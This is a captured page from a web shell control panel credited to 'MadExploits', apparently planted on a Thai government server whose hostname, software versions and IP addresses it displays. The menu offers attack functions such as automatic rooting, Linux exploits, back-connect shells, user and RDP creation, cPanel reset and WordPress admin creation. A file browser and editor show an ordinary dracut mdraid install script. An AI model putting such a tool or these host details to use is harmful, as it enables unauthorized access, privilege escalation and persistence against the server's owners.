Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
dracut /
modules.d /
90mdraid /
[ HOME SHELL ]
Name
Size
Permission
Action
65-md-incremental-imsm.rules
2.04
KB
-rw-r--r--
check
538
B
-rwxr-xr-x
install
1.27
KB
-rwxr-xr-x
installkernel
34
B
-rwxr-xr-x
md-noimsm.sh
78
B
-rwxr-xr-x
md_finished.sh
203
B
-rwxr-xr-x
mdadm_auto.sh
112
B
-rwxr-xr-x
mdcontainer_start.sh
305
B
-rwxr-xr-x
mdmon-pre-udev.sh
149
B
-rwxr-xr-x
mdraid-cleanup.sh
311
B
-rwxr-xr-x
mdraid_start.sh
793
B
-rwxr-xr-x
parse-md.sh
1.22
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install
#!/bin/bash dracut_install mdadm partx # XXX: mdmon really needs to run as non-root? # If so, write only the user it needs in the initrd's /etc/passwd (and maybe /etc/group) # in a similar fashion to modules.d/95nfs. Do not copy /etc/passwd and /etc/group from # the system into the initrd. # dledford has hardware to test this, so he should be able to clean this up. # inst /etc/passwd # inst /etc/group if [ ! -x /lib/udev/vol_id ]; then inst_rules 64-md-raid.rules fi inst_rules "$moddir/65-md-incremental-imsm.rules" if ! mdadm -Q -e imsm /dev/null &> /dev/null; then inst_hook pre-trigger 30 "$moddir/md-noimsm.sh" fi if [[ $hostonly ]] || [[ $mdadmconf = "yes" ]]; then if [ -f /etc/mdadm.conf ]; then inst /etc/mdadm.conf else [ -f /etc/mdadm/mdadm.conf ] && inst /etc/mdadm/mdadm.conf /etc/mdadm.conf fi fi if [ -x /sbin/mdmon ] ; then dracut_install mdmon fi inst_hook pre-udev 30 "$moddir/mdmon-pre-udev.sh" inst "$moddir/mdraid_start.sh" /sbin/mdraid_start inst "$moddir/mdcontainer_start.sh" /sbin/mdcontainer_start inst "$moddir/mdadm_auto.sh" /sbin/mdadm_auto inst "$moddir/md_finished.sh" /sbin/md_finished.sh inst_hook pre-trigger 30 "$moddir/parse-md.sh" inst "$moddir/mdraid-cleanup.sh" /sbin/mdraid-cleanup
Close